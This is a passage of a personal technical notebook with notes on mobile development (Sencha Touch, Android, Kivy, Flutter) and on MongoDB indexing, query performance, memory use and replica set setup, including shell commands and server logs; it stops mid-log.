Using Sencha Cmd with Sencha Touch omidraha@debian:$ cd ~/Tools/js/Sencha/SenchaTouch/touch-2.3.0 omidraha@debian:$ sencha generate app helloTouch /home/omidraha/Prj/Sencha/Touch/

˓→helloTouch/

34.2.3 Deploying Your Application omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build testing omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build production omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app build native omidraha@debian:~/Prj/Sencha/Touch/helloTouch$ sencha app package run config.json

214 Chapter 34. Mobile Programming Omid Raha MyStack Documentation, Release 0.1

# sudo ln -s /home/omidraha/bin/Sencha/Cmd/4.0.0.203/stbuild/ # cp -R /home/omidraha/bin/Sencha/Cmd/4.0.0.203/stbuild/st- res/ ~/Prj/Sencha/Touch/helloTouch

34.3 Android

34.3.1 Get the Android SDK http://developer.android.com/sdk/index.html

34.3.2 Android NDK http://developer.android.com/tools/sdk/ndk/index.html

34.3.3 API Level

API Level

34.3.4 Using adb command root@debian:/path/to/android_sdk//adt-bundle-linux--20131030/sdk/platform-tools# ./

˓→adb push /path/of/file/in/pc/file.zip /path/of/file/in/mobile/new_file.zip root@debian:/path/to/android_sdk//adt-bundle-linux-x86-20131030/sdk/platform-tools# ./

˓→adb shell

Android Virtual Devices (AVDs) http://www.techotopia.com/index.php/Android_4_App_Development_Essentials To change the screen orientation on the emulator, use Crtl-F11. Android introduced fragments in Android 3.0 (API level 11) http://developer.android.com/training/multiscreen/screensizes.html http://developer.android.com/guide/components/fragments.html http://developer.android.com/tools/support-library/features.html#v7-appcompat http://developer.android.com/training/basics/actionbar/index.html http://stackoverflow.com/questions/20720667/where-is-the-option-to-add-a-new-preference-screen-in-android-studio-0-4-0

34.3.5 Using Android in Eclipse https://dl-ssl.google.com/android/eclipse Click Help. Select Install New Software. This will open the Available Software screen, with a list of your available software from the repository you have selected. Click the “Add” button. This is located to the right of the “Work with” field. Clicking this button will open the “Add Repository” dialog box. Here you will enter the information to download the ADT plugin.

34.3. Android 215 Omid Raha MyStack Documentation, Release 0.1

In the “Name” field, enter “ADT Plugin” In the “Location” field, enter “https://dl-ssl.google.com/android/ eclipse/” Click OK. Check the “Developer Tools” box. Click Next to display the list of tools that will be downloaded. Click Next again to open the license agreements. Read them and then click Finish. You may get a warning that the validity of the software cannot be established. It is OK to ignore this warning.

34.3.6 Force Android RTL http://android-developers.blogspot.com/2013/03/native-rtl-support-in-android-42.html https://developer.android.com/about/versions/jelly-bean.html#42-native-rtl https://developer.android.com/reference/android/view/View.html#attr_android:layoutDirection https://developer.android.com/reference/android/view/View.html#attr_android:textDirection https://developer.android.com/reference/android/view/View.html#attr_android:textAlignment https://developer.android.com/reference/android/text/TextUtils.html#getLayoutDirectionFromLocale%28java.util. Locale%29

34.3.7 Before Using Android IDE

$ sudo apt-get install lib32z1 lib32ncurses5 lib32stdc++6

34.3.8 List_of custom Android distributions https://en.wikipedia.org/wiki/List_of_custom_Android_distributions https://www.geckoandfly.com/23320/custom-rom-firmware-android-smartphones/

34.4 Kivy

34.4.1 Using kivy

$ git clone git://github.com/kivy/python-for-android

$ cd python-for-android

$ export ANDROIDSDK="/path/to/Android/sdk" $ export ANDROIDNDK="/path/to/Android/android-ndk-r10d" $ export ANDROIDNDKVER=r10d $ export ANDROIDAPI=14 $ export PATH=$ANDROIDNDK:$ANDROIDSDK/platform-tools:$ANDROIDSDK/tools:$PATH

$ ./distribute.sh -m "openssl pil kivy"

$ cd dist/default

(continues on next page)

216 Chapter 34. Mobile Programming Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ ./build.py --package org.test.touchtracer --name touchtracer --version1.0 --dir /

˓→path/to/android/demo/touchtracer debug

$ ./build.py --package org.test.touchtracer --name touchtracer --version1.0 --dir /

˓→path/to/android/demo/touchtracer release

34.4.2 Ebook

Creating Apps in Kivy

34.4.3 Resources http://kivy.org/docs/api-kivy.html

34.4.4 RTL support issues https://groups.google.com/forum/#!msg/kivy-users/Isjopdt7HQM/pZU5KcQRLkkJ https://github.com/kivy/kivy/issues/1570 https://github.com/kivy/kivy/issues/1619 https://github.com/kivy/kivy/pull/1739 https://github.com/kivy/kivy/pull/1614

34.4.5 APK big size issues

http://stackoverflow.com/questions/23464540/size-of-apk-when-coded-with-kivy-compared-to-the-one-in-java https://github.com/kivy/python-for-android/issues/202

34.5 Flutter https://flutter.io/ https://github.com/flutter/flutter

34.5.1 Flutter with high performance compare with React Native and Native

Compiles to Native Code No reliance on OEM widgets No bridge needed Structural Repainting https://medium.com/@nhancv/why-i-move-to-flutter-34c4005b96ef

34.5. Flutter 217 Omid Raha MyStack Documentation, Release 0.1

34.5.2 Native apps (Java/Swift)

How native Android/iOS code interacts with the platform

Your app talks to the platform to create widgets, or access services like the camera. The widgets are rendered to a screen canvas, and events are passed back to the widgets. This is a simple architecture, bu t you pretty much have to create separate apps for each platform because the widgets are different, not to mention the native languages.

34.5.3 React Native apps (Javascript)

How React Native interacts with the platform

218 Chapter 34. Mobile Programming Omid Raha MyStack Documentation, Release 0.1

React Native is very popular (and deserves to be), but because the JavaScript realm accesses the OEM widgets in the native realm, it has to go through the bridge for those as well. Widgets are typically accessed quite frequently (up to 60 times a second during animations, transitions, or when the user “swipes” something on the screen with their finger) so this can cause performance problems. As one article about React Native puts it: Here lies one of the main keys to understanding React Native performance. Each realm by itself is blazingly fast. The performance bottleneck often occurs when we move from one realm to the other. In order to architect performance React Native apps, we must keep passes over the bridge to a minimum.

34.5.4 Flutter apps (Dart)

How Flutter interacts with the platform

Flutter takes a different approach to avoiding performance problems caused by the need for a JavaScript bridge by using a compiled programming language, namely Dart. Dart is compiled “ahead of time” (AOT) into native code for

34.5. Flutter 219 Omid Raha MyStack Documentation, Release 0.1 multiple platforms. This allows Flutter to communicate with the platform without going through a JavaScript bridge that does a context switch. Flutter has a new architecture that includes widgets that look and feel good, are fast, and are customizable and exten- sible. That’s right, Flutter does not use the OEM widgets (or DOM WebViews), it provides its own widgets. Flutter moves the widgets and the renderer from the platform into the app, which allows them to be customizable and extensible. All that Flutter requires of the platform is a canvas in which to render the widgets so they can appear on the device screen, and access to events (touches, timers, etc.) and services (location, camera, etc.). https://hackernoon.com/why-native-app-developers-should-take-a-serious-look-at-flutter-e97361a1c073

220 Chapter 34. Mobile Programming CHAPTER 35

MongoDB

Contents:

35.1 Indexes

35.1.1 Unique Indexes

Unique indexes enforce uniqueness across all their entries. Thus if you try to insert a document into this book’s sample application’s users collection with an already indexed username value, then the insert will fail with the following exception:

E11000 duplicate key error index: gardening.users.$username_1 dup key:{: "kbanker"}

When creating a unique index on a collection that already contains data, you run the risk of failure since it’s possible that duplicate keys may already exist in the collection. When duplicate keys exist, the index creation fails. If you do find yourself needing to create a unique index on an established collection, you have a couple of options. The first is to repeatedly attempt to create the unique index and use the failure messages to manually remove the documents with duplicate keys. But if the data isn’t so important, you can also instruct the database to drop documents with duplicate keys automatically using the dropDups option. To take an example, if your users collection already contains data, and if you don’t care that documents with duplicate keys are removed, then you can issue the index creation command like this: db.users.ensureIndex({username:1},{unique: true, dropDups: true})

35.1.2 Sparce Indexes

Indexes are dense by default. This means that for every document in an indexed collection, there will be a correspond- ing entry in the index even if the document lacks the indexed key. So for each of entries without indexed key, there will still exist a null entry in the index.

221 Omid Raha MyStack Documentation, Release 0.1

In a sparse index, only those documents having some value for the indexed key will appear. If you want to create a sparse index, all you have to do is specify {sparse:true}. So for example, you can create a unique, sparse index on sku like so: db.products.ensureIndex({sku:1},{unique: true, sparse: true})

35.1.3 Create Indexes, Drop Indexes , Get Indexes Info

> use sample > db.users.insert({username:'ali','uid':1})

> spec={ "ns": "sample.users", "key":{ "uid":1}, "name": "uid_1"} > db.system.indexes.insert(spec, true)

> db.system.indexes.find() { "v":1, "key":{ "_id":1}, "ns": "sample.users", "name": "_id_"} { "v":1, "key":{ "uid":1}, "ns": "sample.users", "name": "uid_1"}

> db.runCommand({'deleteIndexes':'users', index:'uid_1'}) { "nIndexesWas":2, "ok":1} > db.system.indexes.find() { "v":1, "key":{ "_id":1}, "ns": "sample.users", "name": "_id_"}

> db.users.ensureIndex({uid:1}) > db.system.indexes.find() { "v":1, "key":{ "_id":1}, "ns": "sample.users", "name": "_id_"} { "v":1, "key":{ "uid":1}, "ns": "sample.users", "name": "uid_1"}

> db.users.getIndexSpecs() [ { "v":1, "key":{ "_id":1 }, "ns": "sample.users", "name": "_id_" }, { "v":1, "key":{ "uid":1 }, "ns": "sample.users", "name": "uid_1" } ]

> db.users.dropIndex("uid_1") { "nIndexesWas":2, "ok":1}

222 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

35.1.4 Building Indexes

The index builds in two steps. In the first step, the values to be indexed are sorted. A sorted data set makes for a much more efficient insertion into the B-tree. Note that the progress of the sort is indicated by the ratio of the number of documents sorted to the total number of documents:

[conn1] building new index on{ open:1.0, close:1.0} for stocks.values 1000000/4308303 23% 2000000/4308303 46% 3000000/4308303 69% 4000000/4308303 92% Tue Jan4 09:59:13[conn1] external sort used :5 files in 55 secs

For step two, the sorted values are inserted into the index. Progress is indicated in the same way, and when complete, the time it took to complete the index build is indicated as the insert time into system.indexes:

1200300/4308303 27% 2227900/4308303 51% 2837100/4308303 65% 3278100/4308303 76% 3783300/4308303 87% 4075500/4308303 94% Tue Jan4 10:00:16[conn1] done building bottom layer, going to commit Tue Jan4 10:00:16[conn1] done for 4308303 records 118.942secs Tue Jan4 10:00:16[conn1] insert stocks.system.indexes 118942ms

In addition to examining the MongoDB log, you can check the index build progress by running the shell’s currentOp() method:

> db.currentOp() { "inprog":[ { "opid": 58, "active" : true, "lockType": "write", "waitingForLock" : false, "secs_running": 55, "op": "insert", "ns": "stocks.system.indexes, "query":{ }, "client":"127.0.0.1:53421", "desc":"conn", "msg":"index:(1/3) external sort 3999999/4308303 92%" } ] }

The last field, msg, describes the build’s progress. Note also the lockType, which indicates that the index build takes a write lock. This means that no other client can read or write from the database at this time. This means that no other client can read or write from the database at this time. If you’re running in production, this is obviously a bad thing, and it’s the reason why long index builds can be so vexing.

35.1. Indexes 223 Omid Raha MyStack Documentation, Release 0.1

35.1.5 Background indexing

If you’re running in production and can’t afford to halt access to the database, you can specify that an index be built in the background. Although the index build will still take a write lock, the job will yield to allow other readers and writers to access the database. If your application typically exerts a heavy load on MongoDB, then a background index build will degrade performance, but this may be acceptable under certain circumstances. For example, if you know that the index can be built within a time window where application traffic is at a minimum, then background indexing in this case might be a good choice. To build an index in the background, specify {background: true} when you declare the index. The previous index can be built in the background like so: db.values.ensureIndex({open:1, close:1},{background: true})

35.1.6 Offline indexing

If your production data set is too large to be indexed within a few hours, then you’ll need to make alternate plans. This will usually involve taking a replica node offline, building the index on that node by itself, and then allowing the node to catch up with the master replica. Once it’s caught up, you can promote the node to primary and then take another secondary offline and build its version of the index. This tactic presumes that your replication oplog is large enough to prevent the offline node from becoming stale during the index build.

35.1.7 Backups

Because indexes are hard to build, you may want to back them up. Unfortunately, not all backup methods include indexes. For instance, you might be tempted to use mongodump and mongorestore, but these utilities preserve col- lections and index declarations only. This means that when you run mongorestore, all the indexes declared for any collections you’ve backed up will be re-created. As always, if your data set is large, the time it takes to build these indexes may be unacceptable.

35.1.8 The order of fields in an index

• Equality Tests Add all equality-tested fields to the compound index, in any order • Sort Fields (ascending / descending only matters if there are multiple sort fields) Add sort fields to the in- dex in the same order and direction as your query’s sort • Range Filters First, add the range filter for the field with the lowest cardinality (fewest distinct values in the collection) Then the next lowest-cardinality range filter, and so on to the highest-cardinality http://emptysqua.re/blog/optimizing-mongodb-compound-indexes/ The order of fields in an index should be: • First, fields on which you will query for exact values. • Second, fields on which you will sort. • Finally, fields on which you will query for a range of values. http://blog.mongolab.com/2012/06/cardinal-ins/

224 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

35.1.9 Covered query

An index covers a query, a covered query, when: • all the fields in the query are part of that index, and • all the fields returned in the documents that match the query are in the same index. For these queries, MongoDB does not need to inspect at documents outside of the index, which is often more efficient than inspecting entire documents. Example: Given a collection inventory with the following index on the type and item fields:

{ type:1, item:1}

This index will cover the following query on the type and item fields, which returns only the item field: db.inventory.find({ type: "food", item:/^c/},{ item:1, _id:0})

However, this index will not cover the following query, which returns the item field and the _id field: db.inventory.find({ type: "food", item:/^c/},{ item:1}) http://docs.mongodb.org/manual/core/read-operations/#covering-a-query

35.1.10 Selectivity index

Selectivity is the ability of a query to narrow results using the index. Effective indexes are more selective and allow MongoDB to use the index for a larger portion of the work associated with fulfilling the query. To ensure selectivity, write queries that limit the number of possible documents with the indexed field. Write queries that are appropriately selective relative to your indexed data. Suppose you have a field called status where the possible values are new and processed. If you add an index on status you’ve created a low-selectivity index. The index will be of little help in locating records. A better strategy, depending on your queries, would be to create a compound index that includes the low-selectivity field and another field. For example, you could create a compound index on status and created_at. Another option, again depending on your use case, might be to use separate collections, one for each status. http://docs.mongodb.org/manual/tutorial/create-queries-that-ensure-selectivity/

35.1.11 Use Indexes to Sort Query Results

For the fastest performance when sorting query results by a given field, create a sorted index on that field. To sort query results on multiple fields, create a compound index. MongoDB sorts results based on the field order in the index. For queries that include a sort that uses a compound index, ensure that all fields before the first sorted field are equality matches. Example If you create the following index:

{ a:1, b:1, c:1, d:1}

The following query and sort operations can use the index:

35.1. Indexes 225 Omid Raha MyStack Documentation, Release 0.1

db.collection.find().sort({ a:1}) db.collection.find().sort({ a:1, b:1}) db.collection.find({ a:4}).sort({ a:1, b:1}) db.collection.find({ b:5}).sort({ a:1, b:1}) db.collection.find({ a:5}).sort({ b:1, c:1}) db.collection.find({ a:5, c:4, b:3}).sort({ d:1}) db.collection.find({ a:{ $gt:4}}).sort({ a:1, b:1}) db.collection.find({ a:{ $gt:5}}).sort({ a:1, b:1}) db.collection.find({ a:5, b:3, d:{ $gt:4}}).sort({ c:1}) db.collection.find({ a:5, b:3, c:{ $lt:2}, d:{ $gt:4}}).sort({ c:1})

However, the following queries cannot sort the results using the index: db.collection.find().sort({ b:1}) db.collection.find({ b:5}).sort({ b:1})

Note: For in-memory sorts that do not use an index, the sort() operation is significantly slower. The sort() operation will abort when it uses 32 megabytes of memory. http://docs.mongodb.org/manual/tutorial/sort-results-with-indexes/

35.2 Queries

35.2.1 Identifying slow queries

It’s safe to assume that for most apps, queries shouldn’t take much longer than 100 milliseconds. The MongoDB logger has this assumption ingrained, since it prints a warning whenever any operation, including a query, takes more than 100 ms. The logs, therefore, are the first place you should look for slow queries. grep -E '([0-9])+ms' mongod.log

35.2.2 .explain()

For indexed queries, nscanned is the number of index keys in the range that Mongo scanned, and nscannedObjects is the number of documents it looked at to get to the final result. nscannedObjects includes at least all the documents returned, even if Mongo could tell just by looking at the index that the document was definitely a match. Thus, you can see that nscanned >= nscannedObjects >= n always. For simple queries you want the three numbers to be equal. It means you’ve created the ideal index and Mongo is using it. http://emptysqua.re/blog/optimizing-mongodb-compound-indexes/ http://docs.mongodb.org/manual/reference/method/cursor.explain/

226 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

35.2.3 When mongo queries plan expired

The optimizer automatically expires a plan after any of the following events: • 100 writes are made to the collection. • Indexes are added or removed from the collection. • the reIndex rebuilds the index • the mongod process restarts. • A query using a cached query plan does a lot more work than expected. Here, what qualifies as “a lot more work” is a value for nscanned exceeding the cached nscanned value by at least a factor of 10. • Every time a query rans a 1000 or so times, MongoDB checks to see if the selected query plan still is the best one. http://esampaio.com/post/understanding-mongodb-query-plans http://docs.mongodb.org/manual/core/read-operations/#query-optimization

35.2.4 Query Operations that Cannot Use Indexes Effectively

Some query operations cannot use indexes effectively or cannot use indexes at all. Consider the following situations: The inequality operators $nin and $ne are not very selective, as they often match a large portion of the index. As a result, in most cases, a $nin or $ne query with an index may perform no better than a $nin or $ne query that must scan all documents in a collection. Queries that specify regular expressions, with inline JavaScript regular expressions or $regex operator expressions, cannot use an index. However, the regular expression with anchors to the beginning of a string can use an index. http://docs.mongodb.org/manual/core/read-operations/#query-operations-that-cannot-use-indexes-effectively

35.3 Collections

35.3.1 Capped collection

Capped collections guarantee that insertion order and natural order are identical. http://docs.mongodb.org/manual/reference/glossary/#term-natural-order Capped Collections are circular, fixed-size collections that keep documents well-ordered, even without the use of an index. This means that capped collections can receive very high-speed writes and sequential reads. These collec- tions are particularly useful for keeping log files but are not limited to that purpose. Use capped collections where appropriate.

35.3.2 Use Natural Order for Fast Reads

To return documents in the order they exist on disk, return sorted operations using the $natural operator. On a capped collection, this also returns the documents in the order in which they were written. Natural order does not use indexes but can be fast for operations when you want to select the first or last items on disk. http://docs.mongodb.org/manual/core/capped-collections/

35.3. Collections 227 Omid Raha MyStack Documentation, Release 0.1

35.4 Sharding http://blog.mongodb.org/post/47633823714/new-hash-based-sharding-feature-in-mongodb-2-4

35.5 Memory

35.5.1 Working set

The working set for a MongoDB database is the portion of your data that clients access most often. You can estimate size of the working set, using the workingSet document in the output of serverStatus. To return serverStatus with the workingSet document, issue a command in the following form: db.runCommand({ serverStatus:1, workingSet:1}) db.serverStatus({ workingSet:1})

Your working set should stay in memory to achieve good performance. Otherwise many random disk IO’s will occur, and unless you are using SSD, this can be quite slow. http://docs.mongodb.org/manual/faq/diagnostics/#what-is-working-set-and-how-can-i-estimate-it-s-size

35.5.2 Must my working set size fit RAM?

Your working set should stay in memory to achieve good performance. Otherwise many random disk IO’s will occur, and unless you are using SSD, this can be quite slow. One area to watch specifically in managing the size of your working set is index access patterns. If you are inserting into indexes at random locations (as would happen with id’s that are randomly generated by hashes), you will contin- ually be updating the whole index. If instead you are able to create your id’s in approximately ascending order (for example, day concatenated with a random id), all the updates will occur at the right side of the b-tree and the working set size for index pages will be much smaller. It is fine if databases and thus virtual size are much larger than RAM.

35.5.3 How do I calculate how much RAM I need for my application?

The amount of RAM you need depends on several factors, including but not limited to: • The relationship between database storage and working set. • The operating system’s cache strategy for LRU (Least Recently Used) • The impact of journaling • The number or rate of page faults and other MMS gauges to detect when you need more RAM MongoDB defers to the operating system when loading data into memory from disk. It simply memory maps all its data files and relies on the operating system to cache data. The OS typically evicts the least-recently-used data from RAM when it runs low on memory. For example if clients access indexes more frequently than documents, then indexes will more likely stay in RAM, but it depends on your particular usage. To calculate how much RAM you need, you must calculate your working set size, or the portion of your data that clients use most often. This depends on your access patterns, what indexes you have, and the size of your documents. If page faults are infrequent, your working set fits in RAM. If fault rates rise higher than that, you risk performance degradation. This is less critical with SSD drives than with spinning disks.

228 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

35.5.4 How do I read memory statistics in the UNIX top command

Because mongod uses memory-mapped files, the memory statistics in top require interpretation in a special way. On a large database, VSIZE (virtual bytes) tends to be the size of the entire database. If the mongod doesn’t have other processes running, RSIZE (resident bytes) is the total memory of the machine, as this counts file system cache contents. For Linux systems, use the vmstat command to help determine how the system uses memory. On OS X systems use vm_stat. http://docs.mongodb.org/manual/faq/diagnostics/#must-my-working-set-size-fit-ram

35.5.5 Ensure Indexes Fit RAM

For the fastest processing, ensure that your indexes fit entirely in RAM so that the system can avoid reading the index from disk. To check the size of your indexes, use the db.collection.totalIndexSize() helper, which returns data in bytes:

> db.collection.totalIndexSize() 4294976499

The above example shows an index size of almost 4.3 gigabytes. To ensure this index fits in RAM, you must not only have more than that much RAM available but also must have RAM available for the rest of the working set. Also remember: If you have and use multiple collections, you must consider the size of all indexes on all collections. The indexes and the working set must be able to fit in memory at the same time.

35.5.6 Indexes that Hold Only Recent Values in RAM

Indexes do not have to fit entirely into RAM in all cases. If the value of the indexed field increments with every insert, and most queries select recently added documents; then MongoDB only needs to keep the parts of the index that hold the most recent or “right-most” values in RAM. This allows for efficient index use for read and write operations and minimize the amount of RAM required to support the index. http://docs.mongodb.org/manual/tutorial/ensure-indexes-fit-ram/

35.6 Errors

https://github.com/mongodb/mongo/blob/master/docs/errors.md

35.7 ReplicaSet

http://blog.mongodb.org/post/53841037541/real-time-profiling-a-mongodb-cluster MongoDB provides two flavors of replication: master-slave replication and replica sets. For both, a single primary node receives all writes, and then all secondary nodes read and apply those writes to themselves asynchronously. Master-slave replication and replica sets use the same replication mechanism, but replica sets additionally ensure automated failover: if the primary node goes offline for any reason, then one of the secondary nodes will automatically be promoted to primary, if possible. Replica sets provide other enhancements too, such as easier recovery and more sophistical deployment topologies

35.6. Errors 229 Omid Raha MyStack Documentation, Release 0.1

The only time you should opt for MongoDB’s master-slave replication is when you’d require more than 11 slave nodes, since a replica set can have no more than 12 members. In addition to protecting against external failures, replication has been important for MongoDB in particular for dura- bility. When running without journaling enabled, MongoDB’s data files aren’t guaranteed to be free of corruption in the event of an unclean shutdown. Without journaling, replication must always be run to guarantee a clean copy of the data files if a single node shuts down hard. Of course, replication is desirable even when running with journaling. After all, you still want high availability and fast failover. In this case, journaling expedites recovery because it allows you to bring failed nodes back online simply by replaying the journal. This is much faster than resyncing from an existing replica or copying a replica’s data files manually. Journaled or not, MongoDB’s replication greatly increases the reliability of the overall database deployments and is highly recommended. replicas aren’t a replacement for backups. A backup represents a snapshot of the database at a particular time in the past, whereas a replica is always up to date.

35.7.1 Scaling reads with secondaries isn’t practical if any of the following apply

1. The allotted hardware can’t process the given workload. As an example, If your working data set is much larger than the available RAM, then sending random reads to the secondaries is still likely to result in excessive disk access, and thus slow queries. 2. The ratio of writes to reads exceeds 50%. This is an admittedly arbitrary ratio, but it’s a reasonable place to start. The issue here is that every write to the primary must eventually be written to all the secondaries as well. Therefore directing reads to secondaries that are already processing a lot of writes can sometimes slow the replication process and may not result in increased read throughput. 3. The application requires consistent reads. Secondary nodes replicate asynchronously and therefore aren’t guaranteed to reflect the latest writes to the primary node. In pathological cases, secondaries can run hours behind.

35.7.2 Configure a Delayed Replica Set Member

To configure a delayed secondary member, set its priority value to 0, its hidden value to true, and its slaveDelay value to the number of seconds to delay. cfg= rs.conf() cfg.members[0].priority=0 cfg.members[0].hidden= true cfg.members[0].slaveDelay= 3600 rs.reconfig(cfg)

The length of the secondary slaveDelay must fit within the window of the oplog. If the oplog is shorter than the slaveDelay window, the delayed member cannot successfully replicate operations. After the replica set reconfigures, the delayed secondary member cannot become primary and is hidden from applications. http://docs.mongodb.org/manual/tutorial/configure-a-delayed-replica-set-member/ http://docs.mongodb.org/manual/core/replica-set-delayed-member/

35.7.3 Replica sets Setup

The minimum recommended replica set configuration consists of three nodes. Two of these nodes serve as first-class, persistent mongod instances.

230 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

Either can act as the replica set primary, and both have a full copy of the data. The third node in the set is an arbiter, which doesn’t replicate data, but merely acts as a kind of neutral observer. As the name suggests, the arbiter arbitrates: when failover is required, the arbiter helps to elect a new primary node Start by creating a data directory for each replica set member: mkdir /data/mongo-sample/node1 mkdir /data/mongo-sample/node2 mkdir /data/mongo-sample/arbiter

Next, start each member as a separate mongod. Since you’ll be running each process on the same machine, it’s probably easiest to start each mongod in a separate terminal window: mongod --replSet myapp --dbpath /data/mongo-sample/node1 --port 40000 mongod --replSet myapp --dbpath /data/mongo-sample/node2 --port 40001 mongod --replSet myapp --dbpath /data/mongo-sample/arbiter --port 40002

If you examine the mongod log output, the first thing you’ll notice are error messages saying that the configuration can’t be found. The is completely normal:

Sun Jul 14 09:58:55.576 [initandlisten] allocator: tcmalloc Sun Jul 14 09:58:55.576 [initandlisten] options: { dbpath: "/data/mongo-sample/node1",

˓→ port: 4000, replSet: "myapp" } Sun Jul 14 09:58:55.651 [FileAllocator] allocating new datafile /data/mongo-sample/

˓→node1/local.ns, filling with zeroes... Sun Jul 14 09:58:55.651 [FileAllocator] creating directory /data/mongo-sample/node1/_

˓→tmp Sun Jul 14 09:58:55.706 [FileAllocator] done allocating datafile /data/mongo-sample/

˓→node1/local.ns, size: 16MB, took 0.022 secs Sun Jul 14 09:58:55.707 [FileAllocator] allocating new datafile /data/mongo-sample/

˓→node1/local.0, filling with zeroes... Sun Jul 14 09:58:55.729 [FileAllocator] done allocating datafile /data/mongo-sample/

˓→node1/local.0, size: 16MB, took 0.022 secs Sun Jul 14 09:58:55.734 [initandlisten] waiting for connections on port 4000 Sun Jul 14 09:58:55.734 [websvr] admin web console waiting for connections on port

˓→5000 Sun Jul 14 09:58:55.739 [rsStart] replSet can't get local.system.replset config from

˓→self or any seed (EMPTYCONFIG) Sun Jul 14 09:58:55.739 [rsStart] replSet info you may need to run replSetInitiate --

˓→rs.initiate() in the shell -- if that is not already done Sun Jul 14 09:59:05.739 [rsStart] replSet can't get local.system.replset config from

˓→self or any seed (EMPTYCONFIG) Sun Jul 14 09:59:15.739 [rsStart] replSet can't get local.system.replset config from

˓→self or any seed (EMPTYCONFIG)

To proceed, you need to configure the replica set. Do so by first connecting to one of the non-arbiter mongods just started. Connect, and then run the rs.initiate() command: omidraha@debian:~$ mongo --port 4000 > rs.status() { "startupStatus":3, "info": "run rs.initiate(...) if not yet done for the set", (continues on next page)

35.7. ReplicaSet 231 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) "ok":0, "errmsg": "can't get local.system.replset config from self or any seed

˓→(EMPTYCONFIG)" } > rs.initiate() { "info2": "no configuration explicitly specified -- making one", "me": "debian:4000", "info": "Config now saved locally. Should come online in about a minute.", "ok":1 } mongo node1 log:

Sun Jul 14 10:11:02.875[conn2] replSet replSetInitiate admin command received from

˓→client Sun Jul 14 10:11:02.877[conn2] replSet info initiate : no configuration specified.

˓→Using a default configuration for the set Sun Jul 14 10:11:02.877[conn2] replSet created this configuration for initiation :{

˓→_id: "myapp", members:[{ _id:0, host: "debian:4000"}]} Sun Jul 14 10:11:02.877[conn2] replSet replSetInitiate config object parses ok,1

˓→members specified Sun Jul 14 10:11:02.878[conn2] replSet replSetInitiate all members seem up Sun Jul 14 10:11:02.878[conn2] ****** Sun Jul 14 10:11:02.878[conn2] creating replication oplog of size: 50MB... Sun Jul 14 10:11:02.878[FileAllocator] allocating new datafile /data/mongo-sample/

˓→node1/local.1, filling with zeroes... Sun Jul 14 10:11:02.923[FileAllocator] done allocating datafile /data/mongo-sample/

˓→node1/local.1, size: 64MB, took0.044 secs Sun Jul 14 10:11:03.068[conn2] ****** Sun Jul 14 10:11:03.068[conn2] replSet info saving a newer config version to local.

˓→system.replset Sun Jul 14 10:11:03.168[conn2] replSet saveConfigLocally done Sun Jul 14 10:11:03.168[conn2] replSet replSetInitiate config now saved locally.

˓→Should come online in about a minute. Sun Jul 14 10:11:03.168[conn2] command admin.$cmd command:{ replSetInitiate:

˓→undefined} ntoreturn:1 keyUpdates:0 locks(micros) W:291798 reslen:195 292ms Sun Jul 14 10:11:05.765[rsStart] replSet I am debian:4000 Sun Jul 14 10:11:05.766[rsStart] replSet STARTUP2 Sun Jul 14 10:11:06.767[rsSync] replSet SECONDARY Sun Jul 14 10:11:06.767[rsMgr] replSet info electSelf0 Sun Jul 14 10:11:07.767[rsMgr] replSet PRIMARY Sun Jul 14 10:12:48.733[conn2] replSet replSetReconfig config object parses ok,2

˓→members specified Sun Jul 14 10:12:48.734[conn2] replSet replSetReconfig[2] Sun Jul 14 10:12:48.734[conn2] replSet info saving a newer config version to local.

˓→system.replset Sun Jul 14 10:12:48.807[conn2] replSet saveConfigLocally done Sun Jul 14 10:12:48.808[conn2] replSet info : additive change to configuration Sun Jul 14 10:12:48.808[conn2] replSet replSetReconfig new config saved locally

Within a minute or so, you’ll have a one-member replica set. You can now add the other two members using rs.add(): myapp:PRIMARY> rs.add("debian:4001") { "ok":1} mongo node1 log:

232 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

Sun Jul 14 10:12:48.808[conn2] replSet info : additive change to configuration Sun Jul 14 10:12:48.808[conn2] replSet replSetReconfig new config saved locally Sun Jul 14 10:12:48.809[rsHealthPoll] replSet member debian:4001 is up Sun Jul 14 10:12:48.809[rsMgr] replSet total number of votes is even - add arbiter

˓→or give one member an extra vote Sun Jul 14 10:12:58.049[initandlisten] connection accepted from 127.0.0.1:40047 #3

˓→(2 connections now open) Sun Jul 14 10:12:58.811[rsHealthPoll] replset info debian:4001 thinks that we are

˓→down Sun Jul 14 10:12:58.811[rsHealthPoll] replSet member debian:4001 is now in state

˓→STARTUP2 Sun Jul 14 10:13:14.277[initandlisten] connection accepted from 127.0.0.1:40050 #4

˓→(3 connections now open) Sun Jul 14 10:13:14.434[conn4] end connection 127.0.0.1:40050(2 connections now

˓→open) Sun Jul 14 10:13:14.815[rsHealthPoll] replSet member debian:4001 is now in state

˓→RECOVERING Sun Jul 14 10:13:15.117[initandlisten] connection accepted from 127.0.0.1:40051 #5

˓→(3 connections now open) Sun Jul 14 10:13:15.434[initandlisten] connection accepted from 127.0.0.1:40052 #6

˓→(4 connections now open) Sun Jul 14 10:13:16.451[slaveTracking] build index local.slaves{ _id:1} Sun Jul 14 10:13:16.453[slaveTracking] build index done. scanned0 total records.0.

˓→001 secs Sun Jul 14 10:13:16.816[rsHealthPoll] replSet member debian:4001 is now in state

˓→SECONDARY

Within a minute or so, you’ll have a one-member replica set. You can now add the other two members using rs.add(): myapp:PRIMARY> rs.add("debian:4002",{aribterOnly: true}) { "ok":1} mongo node 1 log

Sun Jul 14 10:18:14.555[conn2] replSet info : additive change to configuration Sun Jul 14 10:18:14.555[conn2] replSet replSetReconfig new config saved locally Sun Jul 14 10:18:14.557[rsHealthPoll] replSet member debian:4002 is up Sun Jul 14 10:18:21.957[initandlisten] connection accepted from 127.0.0.1:36193 #17

˓→(5 connections now open) Sun Jul 14 10:18:22.559[rsHealthPoll] replset info debian:4002 thinks that we are

˓→down Sun Jul 14 10:18:22.559[rsHealthPoll] replSet member debian:4002 is now in state

